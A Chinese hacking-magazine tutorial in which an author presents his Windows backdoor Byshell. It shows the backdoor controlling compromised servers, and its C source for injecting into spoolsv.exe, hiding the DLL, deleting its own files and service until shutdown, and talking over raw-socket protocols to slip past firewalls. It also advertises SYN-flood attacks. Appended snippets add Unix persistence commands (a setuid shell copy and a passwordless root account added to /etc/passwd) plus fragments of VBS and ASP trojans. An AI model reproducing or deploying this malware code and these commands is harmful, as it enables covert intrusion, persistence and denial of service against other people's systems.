Byshell后门:无进程无DLL无硬盘文件_漏洞研究

适合读者:入侵爱好者、网络管理员、黑器迷 

前置知识:C基本语法 

刘流:后门是黑客们永恒的话题,在各大网站如163、Yahoo、北大等相继被黑之后,越来越多的人开始关注服务器的安全,而各种后门技术也空前地火暴起来!今天我们将给大家带来一个重量级后门的使用、编程方法,让广大新手朋友们有好后门玩,让编程技术爱好者有好的后门编程技术可以借鉴。当然,更多的新技术还等你去发掘。 

Byshell后门:无进程无DLL无硬盘文件无启动项 

  现在网络上流行的木马后门类工具很多,但可以称为精品的则没有多少,大多数新手们还在使用Radmin一类的软件来替代后门程序。不幸的是,它们并不是一个真正的后门,极容易服务器管理员察觉,因此肉鸡经常飞掉也就很正常了。 

    一个合格的后门至少应该做到不能有陌生进程存在于任务管理器里,给后门进程起一个看起来像系统进程的名字只是掩耳盗铃;不能在注册表Run启动项或者服务启动项里留下众所周知的启动键值或新增服务,当然更不能直接写开始菜单的启动项;不能如同无视管理员或者防火墙一般明目张胆地打开陌生端口;像Bits.dll那样等待连接时无端口,连接时开端口的程序,在端口检查时只有30%的几率能逃脱。另外后门最好能隐藏自己生成的文件,或者避免感染一些管理员经常检查完整性的系统文件。前三点没有做到的后门程序不是一个“比较高级”的后门程序,当然在使用的时候也就没有稳定性、保密性可言了。 

    按照我的分类,现在常见的后门大概可以分成三个“级别”: 

    ★应用级。如WinShell、Radmin、冰河等,它们基本没有采取别的方法来隐藏自己,只是一个普通的能够实现远程控制的应用程序而已。 

    ★系统级。多多少少采用了一些Ring3下隐藏行踪的编程技术,用得少的比如Bits.dll,Portless,用得多的比如Hxdef。 

小提示:Hxdef虽然有一个驱动,但是它对系统的Hook全都是Ring3的,因此大家倾向于称它为系统级而非内核级后门。 

    ★内核级,后门主要部分工作在Ring0,因此有很强的隐蔽性和杀伤力。但是公布的完整的内核级后门数量不多,兼容性也不近人意。这个话题在Phrack和Rootkit.com上有很多有价值的讨论和成果公布。 

    我在自己写的系统级后门Byshell v0.64中尽力做到以上的要求,然而由于个人能力有限,功能的实现不够全面、稳定,希望大家能给我提好的意见或者替我升级版本。在这篇文章中我将和大家讨论这个开源后门的设计、实现,当然还有实际的应用举例,希望高手不要扔板砖,大家一起讨论。 

应用举例 

这是一个实现了无进程、无DLL、无硬盘文件、无启动项的后门程序。利用线程注射DLL到系统进程,解除DLL映射并删除自身文件和启动项,关机时恢复。大量地借鉴和学习了农民Cmdbind2的思想,在这里对农民前辈无私共享的精神致以120分感谢。我允许此软件及其源代码自由传播,但引用时应注明出处。在联系作者并得到同意之前,不得将此软件改编或删选后用作商业用途,可用作学习和私人用途。 

Byshell 0.64支持的命令列表如下:cmd,shell,endshell,chpass,byver,sysinfo,pslist,pskill,modlist,get,put,reboot,dettach,popmsg,SYN,queryDOS,endDOS,refresh等,具体用法请查看说明书。 

小提示:说明书上遗漏了refresh命令,它的作用是清除死掉的连接,并且给你机会重新连接,也可以在你换了一个IP以后,清除原来的连接(否则不能正常连接)。 

安装后门时只要把Ntboot.exe和Ntboot.dll上传到肉鸡同一目录并且执行“ntboot.exe –install”即可,安装完成后可手动删除Ntboot.exe和Ntboot.dll,连接的时候用By064cli.exe。注意Byshell v0.64不支持本机对本机测试,v 0.63可以。现在我用v 0.63演示一下使用的效果: 

1.连接: 

please input the server ip address 

127.0.0.1 

127.0.0.1 will be connected 

input the password(the default one is 'by') 

by 

#cmddir c: 

 驱动器 C 中的卷没有标签。 

 卷的序列号是 CCB2-D751 

 c: 的目录 

2005-01-29  14:22       <DIR>          Documents and Settings 

2004-10-01  19:24       <DIR>          Inetpub 

2004-11-17  20:56       <DIR>          Intel 

2004-10-30  14:18               24,576 isapilog.dll 

2004-11-11  00:55               24,576 magic_asp.dll 

2005-02-07  21:47       <DIR>          My Music 

2004-12-21  00:05                  124 Operate.ini 

2005-01-18  22:38       <DIR>          Program Files 

2005-02-07  23:31       <DIR>          ubackup 

2005-02-02  17:54       <DIR>          WINNT 

               3 个文件         49,276 字节 

               7 个目录    124,207,104 可用字节 

2.获得并结束Shell: 

#shell 

Microsoft Windows 2000 [Version 5.00.2195] 

(C) 版权所有 1985-2000 Microsoft Corp. 

C:WINNTsystem32>cd.. 

cd.. 

C:WINNT>cd.. 

cd.. 

C:>dir 

dir 

 驱动器 C 中的卷没有标签。 

 卷的序列号是 CCB2-D751 

 C: 的目录 

……省略 

               3 个文件         49,276 字节 

               7 个目录    124,207,104 可用字节 

C:>endshell 

shell terminated 

#byver 

ByShell server version 0.63 

Released Dec 19,2004 Copyleft@ "by" co.ltd. 

3.进程列举与Kill。这里有BUG,排列不整齐。 

#pslist 

process: 

pid     filename        num_thread      parentpid 

8       System  43      0 

184     smss.exe        6       8 

208     csrss.exe       11      184 

232     winlogon.exe    19      184 

260     services.exe    31      232 

272     lsass.exe       17      232 

456     svchost.exe     11      260 

488     SPOOLSV.EXE     14      260 

524     msdtc.exe       21      260 

636     svchost.exe     18      260 

656     llssrv.exe      9       260 

688     sqlservr.exe    28      260 

776     winmgmt.exe     3       260 

812     dfssvc.exe      2       260 

832     inetinfo.exe    29      260 

856     mssearch.exe    6       260 

1224    svchost.exe     11      260 

1176    explorer.exe    19      1172 

1356    igfxtray.exe    2       1176 

1404    PFWMain.exe     4       1176 

1412    SOUNDMAN.EXE    2       1176 

1428    realsched.exe   4       1176 

1436    internat.exe    1       1176 

1444    sqlmangr.exe    3       1176 

1280    BitComet.exe    9       1176 

328     notepad.exe     2       1176 

1196    MDM.EXE 5       456 

1512    conime.exe      1       1088 

1520    cmd.exe 1       488 

1504    by063cli.exe    1       1176 

#pskill1428 

OK,job was done,cuz we have localsystem & SE_DEBUG_NAME:) 

#modlist1520 

mods of 1520: 

module_id       module_name     module_path 

1       ntdll.dll       C:WINNTSystem32ntdll.dll 

1       KERNEL32.dll    C:WINNTsystem32KERNEL32.dll 

1       USER32.dll      C:WINNTsystem32USER32.dll 

1       GDI32.DLL       C:WINNTsystem32GDI32.DLL 

1       ADVAPI32.dll    C:WINNTsystem32ADVAPI32.dll 

1       RPCRT4.DLL      C:WINNTsystem32RPCRT4.DLL 

1       MSVCRT.dll      C:WINNTsystem32MSVCRT.dll 

1       IMM32.DLL       C:WINNTSystem32IMM32.DLL 



好了,就介绍这三个最普通的功能吧。其实在很多场合,这三个功能是最基本的功能,也是最难确保稳定性的三个问题疑难,不过这个后门最突出的特色应该是无进程、无DLL、无硬盘文件、无启动项的实现,在实际的使用过程中相信大家会发现它的优点,下面我们从设计和编程的角度来看这些功能是如何实现的。 

设计&编程 

    在这一部分中我不列举完整的代码,因为它太长了,我将引用关键代码来说明编写思路。 

首先是怎样隐藏自身的进程?一个普遍采用的方法就是远程线程注射。但它最大的问题是注射代码到了远程进程的地址空间后,由于地址空间的变化,依赖于原来地址空间的所有直接寻址指令需要重定位。这点对汇编老手来手是很容易理解的,对高级语言程序编写者来说这意味着所有显式和非显式的全局变量(如API地址和字符串)都需要进行手工重定位。 

相比于病毒程序,我们很幸福,因为我们的的注射器可以同时向远程进程注射一个“全局变量块”,再把这个块的地址传送到远程函数,然后在远程函数中使用这个块来替代直接寻址的全局变量,从而免于编写完全“自身可重定位”的代码。后者被认为是非常烦琐并且几乎无法用高级语言实现的。但即使是这样,编写可以重定位的代码复杂度仍然比较大,写功能模块比较多的后门程序将会非常累。农民前辈的Cmdbind2实现了完全手工重定位的注射后门,我们看他的源代码可以发现他仅仅在实现最普通的Bind Shell上就花费了很多代码,像ByShell v0.64这样的功能复杂的后门,如果也这样实现功能的话,无疑是难以想象的。 

    取代直接编写可重定位代码的普遍方法是在注射进入远程进程的函数中加载一个DLL,这样的话系统将为你做重定位工作,后门主要功能实现在DLL中。例如以前的黑防中,单长虹介绍过这种方法。这种方法也有一个小弊端就是管理员在审核被你注射的进程时会发现一个不明的DLL从而导致后门暴露。农民前辈提出了一种思路,先加载DLL,然后把这一块内存全部拷贝到其它地方,卸载DLL,再申请与原来加载DLL相同的地址空间,把其它地方“寄存”的DLL代码拷贝回这个空间。然后直接调用这个DLL,就解决了所有的重定位问题,还不会在被注射进程的加载模块列表里出现我们的DLL。农民前辈并没有实现他的想法为代码,一会给出我用这种方法实现的主要代码。 

    进行比较讨论时我们也来讨论其它的系统级隐藏进程方法。Bingle采用替代Svchost启动的DLL服务的方法来加载后门,ZXshell也使用了这种方法。这种方法的主要问题是不稳定,必须改写注册表敏感键值并在Svchost.exe的加载模块中出现不明模块。当然如果用和原来同名的木马DLL来替代原来的DLL可以避免以上问题,但是又会遇到新的问题,就是怎样绕过Windows的系统文件保护和管理员例行的系统文件完整性检查。 

    Hxdef统一采用Hook ring3 API(主要是Ntdll.dll的NativeAPI)的方法完成自身各个方面的隐藏。这种方法对于一般的Ring3检查效果很好,并且可以部分实现端口复用。它的主要问题有Ring3下Hook的手段不多,而且比较“兴师动众”(Hxdef向系统中所有进程注射木马数据),效果还不是很好,极易被Ring0的RootKit Detector发现,如ICESWORD。最后还有就是编程烦琐。 

    我选用了注射远程进程Spoolsv.exe,假脱机打印服务的方法,并且在注射到远程的函数中加载然后卸载了一个木马DLL——Ntboot.dll,注射器则是Ntboot.exe。请看代码: 

void injcode(){HANDLE prohandle;//注射对象进程句柄 

DWORD pid=0;//对象进程PID 

int ret; //临时变量 

//使用toolhelp32函数得到注射对象PID 

Sleep(1000); 

HANDLE snapshot; 

snapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); 

struct tagPROCESSENTRY32 processsnap; processsnap.dwSize=sizeof(tagPROCESSENTRY32); 

char injexe[]="spoolsv.exe";//注射对象进程,大家可以自己改 

for(Process32First(snapshot,&processsnap); 

Process32Next(snapshot,&processsnap);) 



CloseHandle(snapshot);//得到PID 

//取得SE_DEBUG_NAME权限 

HANDLE hToken; 

OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken); 

TOKEN_PRIVILEGES tp; 

tp.PrivilegeCount = 1; 

LookupPrivilegeValue(NULL, SE_DEBUG_NAME,&tp.Privileges[0].Luid); 

tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED; 

AdjustTokenPrivileges(hToken,0,&tp, sizeof(tp),0,0); 

//现在注射 

prohandle=OpenProcess(PROCESS_ALL_ACCESS,1,pid); 

DWORD WINAPI injfunc(LPVOID);//Injfunc就是注射的函数,需要手工重定位 

//下面取得需要用的API地址并写进将要注射的全局变量块,Injapistr是全局结构,是全局变量块的内容 

HMODULE hModule; 

LPVOID paramaddr;//全局变量块地址 

hModule=LoadLibrary("kernel32.dll"); 

injapistr.myLoadLibrary=(struct HINSTANCE__ *(__stdcall *)(const char *))GetProcAddress(hModule,"LoadLibraryA"); 

injapistr.myGetProcAddress=(FARPROC (__stdcall*)(HMODULE,LPCTSTR))GetProcAddress(hModule,"GetProcAddress"); 

injapistr.myVirtualAlloc=(void *(__stdcall *)(void *,unsigned long,unsigned long,unsigned long))GetProcAddress(hModule,"VirtualAlloc"); 

injapistr.myFreeLibrary=(int (__stdcall *)(struct HINSTANCE__ *))GetProcAddress(hModule,"FreeLibrary"); 

injapistr.myIsBadReadPtr=(int (__stdcall *)(const void *,unsigned int))GetProcAddress(hModule,"IsBadReadPtr"); 

injapistr.myVirtualFree=(int (__stdcall *)(void *,unsigned long,unsigned long))GetProcAddress(hModule,"VirtualFree"); 

//在目标进程里分配“全局变量块”,并写入API地址 

paramaddr=VirtualAllocEx(prohandle,0,sizeof(injapistr),MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE); 

ret=WriteProcessMemory(prohandle,paramaddr,&injapistr,sizeof(injapistr),0); 

//写入Injfunc函数 

void* injfuncaddr=VirtualAllocEx(prohandle,0,20000,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE); 

ret=WriteProcessMemory(prohandle,injfuncaddr,injfunc,20000,0); 

//激活远程线程 

CreateRemoteThread(prohandle,0,0,(DWORD (WINAPI *)(void *))injfuncaddr,paramaddr,0,0); 

CloseHandle(prohandle); 

return; 



//注射到远程的函数,负责完成加载和卸载功能复杂的木马DLL的艰巨任务 

DWORD WINAPI injfunc(LPVOID paramaddr){ 

//paramaddr,全局变量块首址。所有静态全局变量都需要重定位(直接寻址的),而动态分配(堆,Virtualalloc)和栈变量不需要,因为他们使用间接寻址。其实字符串也可以在刚才写进全局变量块,但是字符串不多,这里直接用ASM搞定。 

char ntboot[16]; 

char msgbox[16];//变量名字起错了,应该是DLL的后门主函数名。汗,希望不要误导大家。 

INJAPISTR * pinjapistr=(INJAPISTR *)paramaddr; 

__asm{  

mov ntboot,'n' 

mov ntboot+1,'t' 

mov ntboot+2,'b' 

mov ntboot+3,'o' 

mov ntboot+4,'o' 

mov ntboot+5,'t' 

mov ntboot+6,'.' 

mov ntboot+7,'d' 

mov ntboot+8,'l' 

mov ntboot+9,'l' 

mov ntboot+10,0 

mov msgbox,'C' 

mov msgbox+1,'m' 

mov msgbox+2,'d' 

mov msgbox+3,'S' 

mov msgbox+4,'e' 

mov msgbox+5,'r' 

mov msgbox+6,'v' 

mov msgbox+7,'i' 

mov msgbox+8,'c' 

mov msgbox+9,'e' 

mov msgbox+10,0 



HMODULE hModule=pinjapistr->myLoadLibrary(ntboot);//加载Ntboot.dll 

DWORD (WINAPI *myCmdService)(LPVOID);//DLL后门的主函数名  

myCmdService=(DWORD (WINAPI *)(LPVOID))(pinjapistr->myGetProcAddress(hModule,msgbox)); 

//各位看官,以下是精华了: 

unsigned int memsize=0; 

void * tempdll=pinjapistr->myVirtualAlloc(0,0x23000,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE); 

memcpy(tempdll,hModule,0x23000); 

//0x23000是DLL的大小,不多不少。如果你改变了Ntboot.dll的大小请注意调整这个值 

pinjapistr->myFreeLibrary(hModule); 

hModule=(HMODULE)pinjapistr->myVirtualAlloc(hModule,0x23000,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE); 

memcpy(hModule,tempdll,0x23000); 

pinjapistr->myVirtualFree(tempdll,0x23000,MEM_DECOMMIT); 

//结束,DLL没有被加载,但是又可以发挥作用,爽吧?! 

myCmdService(0);//调用后门主函数。 

return 0; 



    下一个问题是启动项和文件。Ntboot.exe是后门的注射器,将自己作为服务启动,我们决不能让管理员发现服务键值。怎么办?这个也是农民前辈提出的思想:先删除所有后门文件和服务,设定一个关机通知和一个一键关机钩子,在即将关机的时候写入文件和服务项。同样的,一开机这个服务只要启动了就会先把自己删除。这样就实现了无文件和无启动项。管理员用注册表对比将不能发现异常,也无处寻找我们的后门文件。看一下设定一个关机通知和一个一键关机钩子的代码: 

DWORD WINAPI hookthread( LPVOID lpParam ){ 

MSG msg;int tmpret;char tmpstr[100]; 

LRESULT CALLBACK JournalRecordProc(int code,WPARAM wParam,LPARAM lParam); 

msghook=SetWindowsHookEx(WH_JOURNALRECORD,JournalRecordProc,GetModuleHandle(0),0); 

if(!msghook) 

tmpret=SetConsoleCtrlHandler(HandlerRoutine,1); 

if(!tmpret) 

while (GetMessage(&msg, NULL, 0, 0)){void resume(); 

if(msg.message==WM_QUERYENDSESSION) 



UnhookWindowsHookEx(msghook); 

return 0; 

BOOL WINAPI HandlerRoutine(DWORD dwCtrlType){void resume(); 

switch(dwCtrlType) 



case CTRL_SHUTDOWN_EVENT: 

resume();//resume函数,顾名思义就是恢复文件启动项 

break; 

default: 

break; 



return 0; 

LRESULT CALLBACK JournalRecordProc(int code,WPARAM wParam,LPARAM lParam){void resume(); 

if(code<0){return CallNextHookEx(msghook,code,wParam,lParam);} 

if(code==HC_ACTION){ 

 EVENTMSG * pevent=(EVENTMSG *)lParam; 

 if(pevent->message==WM_KEYDOWN && LOBYTE(pevent->paramL)==0xFF) 



return CallNextHookEx(msghook,code,wParam,lParam); 

    与Hxdef的Hook文件注册表的Native API相比,这种办法的好处是根本就不存在文件,也不会有什么Ring0的Rootkit Detector发现被Hook API隐藏的文件和注册表项。坏处是如果对方直接拔电源关机我们就“安息”了。于是我们就会安慰自己说:这个后门有足够的隐蔽性,不会让对方怀疑到中了后门,以至于采用掉电关机的BT手段。当然如果你用Hxdef,那么相信我,现在的Rootkit Detector很普遍,Hxdef已经成为众矢之的了,在管理员检查时也会“安息”得很快的。 

    最后是怎样实现无端口(像用Rootkit隐藏掉端口那种不叫无端口。那种东西不但无法穿过防火墙还会在管理员扫描自己的机器时暴露),这是Byshell v0.64的弱项,Ring3后门本来难有什么好办法来进行端口复用,使用Raw_socket监听TCP只能做到Bits.dll那样的“等待连接时无端口”;把自己加载成SPI基础服务提供者或者分层服务提供者,可以截获所有Ring3网络通讯,但会在注册表和系统中留下足够多的信息从而导致我们后门“安息”。Hxdef的Hook系统中所有进程的Recv/WSArecv方法虽然有不能复用Ring0端口如139,445的弊端,但还是现在看来比较好的Ring3端口复用的办法。到现在为止,Byshell采取的方法是使用Socket_raw的自定义协议,就是非TCP非UDP协议进行通讯,可以穿越大多软件防火墙和一些硬件防火墙,但是它的弊端是不保证穿过所有防火墙,并且不支持Windows XP SP2,因为后者取消了对Socket_raw的支持。我的实现比较简单,就是用一个协议号224监听连接和刷新,另一个协议号225传输后门数据,很简单: 

WSADATA WSAData; 

WSAStartup(MAKEWORD(2,2),&WSAData); 

SOCKET sock224=socket(AF_INET,SOCK_RAW,224); 

sockaddr_in srvaddr; 

memset(&srvaddr,0,sizeof(struct sockaddr_in)); 

srvaddr.sin_family= AF_INET; 

srvaddr.sin_addr.S_un.S_addr =INADDR_ANY; 

ret=bind(sock224,(struct sockaddr *)&srvaddr,sizeof(struct sockaddr)); 

if(ret){goto label2;} 

dwThreadId=0;char buff224[128]; 

DWORD WINAPI threadfunc( LPVOID lpParam ); 

HANDLE thrdhndl; 

//建立225的连接线程 

thrdhndl=CreateThread(0, 0, threadfunc, 0, 0, &dwThreadId); 

//等待刷新 

while(1){recvfrom(sock224,buff224,128,0,0,0); 

if(!strncmp(buff224+32+sizeof(IP_HEADER),"+_)(*&^%$#@!~byrefreshbreak",27) && !strncmp(buff224+sizeof(IP_HEADER),pwd,strlen(pwd))){ 

 TerminateThread(thrdhndl,0);goto label1;} 



    在225的代码里我实现了简单的差错控制,代码比较长这里不列举了,有兴趣的朋友请看源代码。由于这个复用方法不是非常可靠、稳定,所以我公布了Byshell v0.63,它直接开了一个TCP端口138,完全不符合后门要求,但是给大家用来作测试还是可以的。如果大家发现Byshell v0.64不是很稳定可以试试v0.63。不过一个严重的失误是我在Byshell v0.64的说明书里漏了一个命令“refresh”,它可以清除万一出现的225连接死掉,并且给你机会重新连接。 

    最后就是Byshell实现了非常多的命令,比如查看系统信息、执行命令、在后门连接中上传下载,甚至还有SYN洪水攻击。后门的功能模块是Work()函数,这样便于进行功能拓展和模块化编程。针对它端口复用不理想的现状,我会继续升级。以后可能写成Hxdef那样的Ring3复用,也可能是Ring0的过滤驱动之类的东西,也希望前辈们继续指导我。 

我的代码风格并不好,喜欢不分行和紧凑代码,不过还是希望大家一起来开发这个软件。在这个后门的写作中,3个人给了我很大的帮助,请允许我占用篇幅来表示对他们的感谢。他们是谷夕(gxisone),黄鑫(glacier),当然还有农民,这个后门应该是他们的功劳。 

如果有问题或者想和我交流,请Mail到baiyuanfan@163.com,谢谢大家对ByShell和我的关注和支持。 

时间: 2025-01-21 14:40:24

Byshell后门:无进程无DLL无硬盘文件_漏洞研究的相关文章

推荐:二次发现桃源网络硬盘漏洞_漏洞研究

本人在第10期上的黑防刊登了桃源网络硬盘相关的漏洞后.马上就通知了桃源官方修复了相关漏洞.近日,下班后无聊,就重新下载了桃源网络硬盘的最新版本2.5进行全面检测.发现虽然修补了用".",另存.下载其网站的配置文件及数据库等漏洞.但用其它的方法作了个测试后发现,汗.还是存在相关漏洞,还有就是可以构造代码,任意查看网络硬盘所有文件的源代码及配置文件和数据库.好的,转入正题吧. 为了给大家给个真实的视觉效应,特意在官方详细测试.第一就是上传漏洞,在这里官方已经换上了最新版本的V2.5了.所在

系统后门手法和日志的擦除_漏洞研究

好不容易搞了台服务器很不容易,如果被发现了就没了!可惜啊! 其实,开后门的方法有很多种 1. setuid  #cp /bin/sh /tmp/.sh #chmod u+s /tmp/.sh 加上 suid 位到shell上,虽然很简单,但容易被发现  2. echo "hack::0:0::/:/bin/csh" >> /etc/passwd 即给系统增加一个 id 为 0(root)的帐号,无口令. 但管理员很快就可以发现哦! 3.echo "++"

木马静态变动态 DLL木马程序大揭秘_漏洞研究

相信经常玩木马的朋友们都会知道一些木马的特性,也会有自己最喜爱的木马,不过,很多朋友依然不知道近年兴起的"DLL木马"为何物.什么是"DLL木马"呢?它与一般的木马有什么不同?  一.从DLL技术说起 要了解DLL木马,就必须知道这个"DLL"是什么意思,所以,让我们追溯到几年前,DOS系统大行其道的日子里.在那时候,写程序是一件繁琐的事情,因为每个程序的代码都是独立的,有时候为了实现一个功能,就要为此写很多代码,后来随着编程技术发展,程序员们把

你根本想不到的——IIS另类后门_漏洞研究

终于由学校步入了社会,发现其实学校还是有很多值得我们留恋的地方,而工作其实蛮辛苦的,最主要的是不能经常和朋友一起去网上玩了.上周六回了趟学校,在主机房里和做网管的朋友聊天,偶然发现一个很熟的ASP程序在服务器的网站目录里(以前我是学校网络组的成员之一),于是连了下看看,没有给予匿名浏览的权限,不过账号勾选的是记住密码,登录成功.网页显示"添加test2用户成功","添加test2管理员成功".呵呵,我连管理员密码都不知道呢.打开3389,叫朋友看了下用户列表-- 

入侵之中杀防火墙进程的代码_漏洞研究

写一个VBS脚本:  在SHELL里输入:  copy con kill.vbs (菜鸟注意:执行完这行之后就没有命令提示符了)  CODEstrComputer = "."  Set objWMIServive = GetObject("winmagmts:" _   & "{impersonationLevel=impcrsonatc}!\\" &strComputer & "\root\cimv2"

ASP木马后门新思路_漏洞研究

<%   Function GetPage(url)   dim Retrieval   Set Retrieval = createObject("Microsoft.XMLHTTP")   With Retrieval   .Open "Get", url, False ', "", ""   .Send   GetPage = BytesToBstr(.ResponseBody)   End With   Set 

mysql-win7系统安装 VC++时候提示无权限操作dll文件?

问题描述 win7系统安装 VC++时候提示无权限操作dll文件? 微软官网下载的,先是普通用户登录的,先安装2012版的提示无权限操作dll文件,启用administrator用户,安装还是提示无权限!下个2015版的什么都不提示到最后来个安装失败!谁指导一下,我想装wampserver,总是提示缺少dll文件? 解决方案 Windows 7 完美安装 Visual C++ 6.0 http://download.csdn.net/detail/caozhy/7820407 其中VC++下载安

有谁碰到过注册dll无反应的情况

问题描述 有谁碰到过注册dll无反应的情况 有谁碰到过注册dll无反应的情况,不提示成功也不提示失败,也没注册成功,可能是什么原因啊? 解决方案 是不是,该DD本身就不需要注册! 解决方案二: 是否dllregistrer函数有正确实现.

Win7系统添加打印机无Print Spooler服务无注册表解决方法

  Win7系统添加打印机无Print Spooler服务无注册表解决方法.win764位系统刚装几天发现笔记本无法安装虚拟打印机,因为我经常使用PDF打印,比如cutePDF打印机.开始搜索各种经验,发现都无法解决问题, 总有各种疏漏,在此总结一下,供自己回顾,同时希望能惠及他人. 方法/步骤 问题描述,在设备与打印机中"添加打印机"时提示Windows无法添加打印机,后台相关服务没有运行. 通过百度知晓,原因可能是服务printer spooler没有运行.此时去查看该项服务.具体